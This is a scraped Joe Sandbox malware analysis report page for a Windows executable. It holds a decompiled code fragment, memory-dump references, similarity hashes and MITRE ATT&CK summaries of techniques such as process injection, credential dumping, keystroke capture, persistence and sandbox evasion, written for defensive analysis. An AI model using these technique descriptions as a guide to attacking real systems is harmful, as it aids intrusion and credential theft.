					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report F7E3DjYJpC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre